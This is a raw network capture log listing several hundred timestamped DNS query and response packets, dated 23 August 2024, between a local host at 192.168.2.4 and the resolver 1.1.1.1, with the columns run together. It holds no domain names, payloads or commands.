                                                                                                                                                                                                              Aug 23, 2024 18:47:43.787477970 CEST6091053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.787821054 CEST53611761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.787965059 CEST5475853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788198948 CEST5490353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788383007 CEST5600753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788465023 CEST53548221.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788568020 CEST6372153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788777113 CEST6409253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788914919 CEST6501953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.789300919 CEST5869453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.789483070 CEST5914453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.789727926 CEST5138553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.789928913 CEST53560901.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.789952993 CEST6547553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790107012 CEST5079153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790288925 CEST5854253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790316105 CEST53569791.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790327072 CEST53513721.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790488958 CEST5870853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790663958 CEST5229453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790818930 CEST6198253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.791018009 CEST53606181.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.791033030 CEST6083553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.791255951 CEST53491811.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.791580915 CEST6158753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.791800976 CEST53504471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.799992085 CEST53538681.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.800170898 CEST53637471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.800182104 CEST53578241.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.800653934 CEST53647291.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.805715084 CEST53585631.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.806020021 CEST53529051.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.807444096 CEST53610481.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.809235096 CEST53646591.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.810796022 CEST53653831.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.811742067 CEST53632761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.812876940 CEST53511071.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.812889099 CEST53648461.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.813764095 CEST53522321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.813775063 CEST53506661.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.814497948 CEST53652121.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.814619064 CEST53519701.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.814630985 CEST53629141.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.815135956 CEST53492621.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.815145969 CEST53531611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.815155029 CEST53572501.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.815166950 CEST53609221.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.815176010 CEST53622611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.815186977 CEST53598281.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.815888882 CEST53525991.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.816562891 CEST53609101.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.816956043 CEST53637211.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.817608118 CEST53652891.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.817696095 CEST53587501.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.817706108 CEST53640921.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.817795992 CEST53560071.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.817806005 CEST53650191.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.817816019 CEST53513851.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.818276882 CEST53547581.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.818538904 CEST53585421.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.818547964 CEST53522941.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.818655014 CEST53507911.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.819715023 CEST53654751.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.820785046 CEST53587081.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.821137905 CEST53615871.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.821147919 CEST53608351.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.821247101 CEST53619821.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.832201958 CEST53540651.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.835057974 CEST53584071.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.837970018 CEST53591441.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.841598034 CEST53549031.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.841609955 CEST53644731.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.940402985 CEST53520541.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.946537971 CEST53610781.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.964014053 CEST53586941.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.990935087 CEST5083253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.991859913 CEST5836753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.993124008 CEST5791753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.993768930 CEST6478153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.994611025 CEST5382453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.996454000 CEST6199853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.997402906 CEST5973253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.998368025 CEST5556153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.999161959 CEST5632453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.000149012 CEST53565071.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.000152111 CEST5777153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.002085924 CEST5046853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.005590916 CEST5887053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.006455898 CEST5777653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.007169962 CEST6410153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.008037090 CEST5312153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.009016991 CEST5659853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.009788990 CEST5642353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.010381937 CEST5246453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.011153936 CEST6316553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.011753082 CEST6341453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.014139891 CEST5748253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.014770985 CEST5576153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.015391111 CEST6487053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.015984058 CEST6282653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.016774893 CEST5820353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.017678022 CEST5997553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.018395901 CEST6107353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.019260883 CEST5969853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.019799948 CEST53583671.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.022563934 CEST53647811.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.027420044 CEST53538241.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.027431965 CEST53597321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.031379938 CEST53619981.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.031390905 CEST53563241.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.033946991 CEST53588701.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.033957958 CEST53504681.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.033967972 CEST53641011.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.033977985 CEST53565981.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.038348913 CEST53564231.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.038360119 CEST53634141.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.038369894 CEST53531211.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.041116953 CEST53557611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.041127920 CEST53631651.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.041146040 CEST6119853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.046195984 CEST53524641.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.046205997 CEST53648701.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.046216011 CEST53574821.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.046224117 CEST53582031.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.046233892 CEST53599751.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.049092054 CEST53596981.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.060003996 CEST5697553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.060467958 CEST5224153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.060549974 CEST5962853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.060830116 CEST5058953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.061041117 CEST5095353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.063958883 CEST53577761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.064866066 CEST5648853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.065064907 CEST5044553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.065272093 CEST6025853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.065653086 CEST6338253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.065653086 CEST5242353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.065845013 CEST5268053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.074814081 CEST53611981.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.087069035 CEST53537781.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.093502998 CEST53522411.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.093858004 CEST53596281.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.093868017 CEST53505891.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.099387884 CEST53602581.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.099838972 CEST53504451.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.099848986 CEST53524231.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.104453087 CEST53526801.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.104468107 CEST53564881.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.118882895 CEST53555611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.121835947 CEST53633821.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.188319921 CEST53577711.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.197954893 CEST53628261.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.198863029 CEST6082953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.199259043 CEST5857653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.199601889 CEST5570853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.199825048 CEST5855953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.200206995 CEST5186653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.200620890 CEST5499653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.201368093 CEST6149253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.202778101 CEST6067753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.203243017 CEST5055653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.203408957 CEST6120953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.203697920 CEST6550853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.205009937 CEST5935253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.205390930 CEST5179053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.206001043 CEST4969553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.206231117 CEST5902953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.206832886 CEST6073953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.237602949 CEST53608291.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.237613916 CEST53610731.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.241451025 CEST53557081.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.241462946 CEST53614921.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.241472006 CEST53518661.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.245616913 CEST53585591.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.245628119 CEST53606771.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.248733044 CEST53517901.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.248744011 CEST53496951.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.248753071 CEST53505561.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.250492096 CEST53655081.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.250503063 CEST53612091.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.250511885 CEST53569751.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.250526905 CEST53509531.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.252305031 CEST53590291.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.260529995 CEST53579171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.262521982 CEST53585761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.265252113 CEST53549961.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.272128105 CEST53593521.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.429379940 CEST53607391.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.801368952 CEST53508321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:46.270370007 CEST5544153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:46.489918947 CEST53554411.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.304891109 CEST5357653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.305859089 CEST6052953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.306653023 CEST6330853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.310770988 CEST5883753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.311697960 CEST5891853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.312558889 CEST6486253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.312881947 CEST6355053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.313781977 CEST5343853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.313868999 CEST5672553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.314661026 CEST6146653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.314800978 CEST4947953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.315795898 CEST6371253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.316380024 CEST5269653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.317368984 CEST5153253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.318161964 CEST5904253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.318479061 CEST5054953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.319293976 CEST5162953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.319479942 CEST4944353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.319598913 CEST5753653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.320473909 CEST5947253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.320872068 CEST5704653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.321798086 CEST6034653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.322367907 CEST5254953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.323297977 CEST6147953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.323925972 CEST6516453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.324670076 CEST5393153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.324985027 CEST5157053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.326898098 CEST5327853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.327786922 CEST6317053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.328895092 CEST6121853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.329237938 CEST5433453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.329687119 CEST6037853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.329725027 CEST6317653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.330248117 CEST6029253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.330523968 CEST5378153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.330625057 CEST6206253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.331185102 CEST5742953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.331590891 CEST5082553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.331671953 CEST5526053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.332353115 CEST5270053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.332806110 CEST5264653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.332865953 CEST5874453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.333395958 CEST5372753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.333802938 CEST6292753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.333952904 CEST6186553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.334290981 CEST5978153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.334804058 CEST5879053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.334922075 CEST6236353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.335546970 CEST5639753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.335745096 CEST5744953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.336077929 CEST6206453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.336649895 CEST6428053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.337029934 CEST6380453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.337173939 CEST5624053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.337801933 CEST5118453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.337858915 CEST6094153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.338368893 CEST5679453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.338383913 CEST6209853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.339353085 CEST5103653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.339840889 CEST5392053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.340034962 CEST6053553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.340312004 CEST4937853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.340318918 CEST53605291.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.340643883 CEST5187553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.341439009 CEST5765953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.342050076 CEST53633081.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.346520901 CEST53648621.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.346535921 CEST53589181.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.346545935 CEST53494791.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.346554995 CEST53635501.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.346565008 CEST53567251.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.347894907 CEST53515321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.347903967 CEST53526961.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.347913027 CEST53637121.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.347923040 CEST53590421.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.347933054 CEST53505491.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.353128910 CEST53516291.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.353138924 CEST53494431.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.353147984 CEST53525491.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.358262062 CEST53651641.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.358277082 CEST53515701.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.358284950 CEST53535761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.358294010 CEST53532781.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.359030962 CEST53526461.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.359924078 CEST53603781.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.359935045 CEST53612181.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.359944105 CEST53631761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.359952927 CEST53574291.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.365668058 CEST53602921.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.365679026 CEST53537811.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.366488934 CEST53620621.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.366498947 CEST53508251.1.1.1192.168.2.4
